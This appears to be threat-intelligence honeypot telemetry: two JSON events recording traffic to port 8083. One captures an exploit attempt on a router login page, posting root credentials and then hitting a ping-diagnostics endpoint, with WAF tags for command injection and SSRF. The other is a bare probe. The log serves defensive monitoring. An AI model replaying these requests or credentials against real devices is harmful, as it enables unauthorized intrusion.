177.22.44.30

{
    "protocol_emulated": true,
    "emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b",
    "emulator_response_len": 82,
    "http_header_count": 4,
    "http_query_params": 0,
    "http_path_depth": 1,
    "http_path_ext": "gch",
    "http_ua_hash": "cf457b39ca1ed09a62427df715058d10b039c109",
    "http_host_hash": null,
    "http_target_hash": "297c504799609cfe753e35db128a9be162f28f7d",
    "http_referer_hash": null,
    "http_method": "POST",
    "http_ua_is_cli": false,
    "http_ua_is_browser": false,
    "bytes_in": 659,
    "payload_entropy": 5.466302572005077,
    "port_category": "registered",
    "org": "Conecta Tecnologia LTDA",
    "service": "http",
    "app_proto": "http",
    "asn": 52981,
    "country": "BR",
    "dst_port": 8083,
    "risk_waf": 100,
    "risk_classification": 84,
    "risk_behavior": 0,
    "risk_geo": 0,
    "risk_protocol": 43,
    "risk_novelty": 25,
    "risk_boost": 15,
    "risk_granularity": 6.7,
    "risk_breakdown": {
        "waf": 100,
        "classification": 84,
        "behavior": 0,
        "geo": 0,
        "protocol": 43,
        "novelty": 25
    },
    "risk_score": 82,
    "tag_count": 11,
    "anomaly_count": 0,
    "campaign_key": "567ee99ead398d5e8dff08296735fd3324b36997",
    "event_fingerprint": "a858fca3b3a8ef48dad20a1cb938d02f0de6e320",
    "classification_reason": "R\u00e8gle WAF \u00ab ssrf-3 \u00bb \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%",
    "confidence": 1,
    "classification_confidence": 1,
    "precision_score": 110,
    "precision_signals": [
        "INT-http_ssrf",
        "INT-upstream",
        "INT-waf-score"
    ],
    "kb_rule_ids": [
        "INT-http_ssrf",
        "INT-upstream",
        "INT-waf-score"
    ],
    "risk_confidence_factor": 100,
    "city": null,
    "is_datacenter": false,
    "is_tor_hint": false,
    "geo": {
        "country": "BR",
        "asn": 52981,
        "org": "Conecta Tecnologia LTDA",
        "is_datacenter": false,
        "is_tor_hint": false
    },
    "fingerprint": {
        "http_ua_hash": "cf908e3be2b0e84af769ea28409d6afb",
        "payload_hash": "a6d724e184027cf38cffffe097052d1c",
        "path_pattern_hash": "566116aa56cf0726ba77deefe998a873"
    },
    "target_context": {
        "dst_port": 8083,
        "service": "http"
    },
    "payload_preview": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Loginto",
    "method": "POST",
    "path": "\/login.gch",
    "user_agent": "r00ts3c-owned-you",
    "waf_tags": [
        "950327:rce-0",
        "950331:rce-1",
        "950407:ssrf-3",
        "950471:nosqli-3"
    ],
    "waf_rule_names": [
        "rce-0",
        "rce-1",
        "ssrf-3",
        "nosqli-3"
    ],
    "request_line": "POST \/login.gch HTTP\/1.1",
    "request_sample": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST \/manager_dev_ping_t.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: ",
    "payload_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Loginto",
    "evidence": {
        "method": "POST",
        "path": "\/login.gch",
        "user_agent": "r00ts3c-owned-you",
        "waf_tags": [
            "950327:rce-0",
            "950331:rce-1",
            "950407:ssrf-3",
            "950471:nosqli-3"
        ],
        "waf_rule_names": [
            "rce-0",
            "rce-1",
            "ssrf-3",
            "nosqli-3"
        ],
        "request_line": "POST \/login.gch HTTP\/1.1",
        "request_sample": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Logintoken=4&Username=root&Password=W%21n0%26oO7.POST \/manager_dev_ping_t.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: ",
        "payload_snippet": "POST \/login.gch HTTP\/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 420\r\nConnection: keep-alive\r\nAccept: *\/*\r\n\r\nFrm_Loginto",
        "classification_reason": "R\u00e8gle WAF \u00ab ssrf-3 \u00bb \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%"
    },
    "attack_stage": "exploit_attempt",
    "mitre_tactics": [
        "TA0001",
        "TA0002"
    ],
    "threat_family": [
        "ssrf_probe"
    ],
    "recommended_client_action": "investigate",
    "policy_mode": "intelligence",
    "sensor_role": "threat_intelligence",
    "event_signature": "591f478c7d4184497804d2c55b38f54176e46532",
    "ban_policy": "advisory_investigate",
    "tags_list": [
        "950327:rce-0",
        "950331:rce-1",
        "950407:ssrf-3",
        "950471:nosqli-3",
        "http_cmd_injection",
        "http_credential_body",
        "http_idor_probe",
        "http_jwt_body",
        "http_missing_host",
        "http_ssrf_body",
        "net_web_probe"
    ]
}

{
    "protocol_emulated": true,
    "emulator_response": "485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b",
    "emulator_response_len": 82,
    "port_inferred_service": true,
    "bytes_in": 0,
    "payload_entropy": 0,
    "port_category": "registered",
    "org": "Conecta Tecnologia LTDA",
    "service": "http-alt-8083",
    "app_proto": "http-alt-8083",
    "asn": 52981,
    "country": "BR",
    "dst_port": 8083,
    "risk_waf": 8,
    "risk_classification": 0,
    "risk_behavior": 0,
    "risk_geo": 0,
    "risk_protocol": 22,
    "risk_novelty": 0,
    "risk_boost": 0,
    "risk_granularity": 3.7,
    "risk_breakdown": {
        "waf": 8,
        "classification": 0,
        "behavior": 0,
        "geo": 0,
        "protocol": 22,
        "novelty": 0
    },
    "risk_score": 0,
    "tag_count": 0,
    "anomaly_count": 0,
    "campaign_key": "4d8aadabcd1c859671a9c5ddc55350e79e517b17",
    "event_fingerprint": "aafb7ac8941c9e078930e4799c90ed51eac5bf8d",
    "classification_reason": "Type \u00ab http-alt-8083 \u00bb (signaux protocolaires) \u00b7 confiance 0%",
    "confidence": 0,
    "classification_confidence": 0,
    "precision_score": 0,
    "precision_signals": [],
    "kb_rule_ids": [],
    "risk_confidence_factor": 0,
    "city": null,
    "is_datacenter": false,
    "is_tor_hint": false,
    "geo": {
        "country": "BR",
        "asn": 52981,
        "org": "Conecta Tecnologia LTDA",
        "is_datacenter": false,
        "is_tor_hint": false
    },
    "fingerprint": {
        "path_pattern_hash": "54f123e610d8386f898485b621afba15"
    },
    "target_context": {
        "dst_port": 8083,
        "service": "http-alt-8083"
    },
    "attack_stage": "probe",
    "mitre_tactics": [
        "TA0007",
        "TA0001"
    ],
    "threat_family": [
        "unknown"
    ],
    "recommended_client_action": "monitor",
    "policy_mode": "intelligence",
    "sensor_role": "threat_intelligence",
    "event_signature": "6163c2957bda6c59889ded9bedae57bac6349b51",
    "ban_policy": "advisory_monitor"
}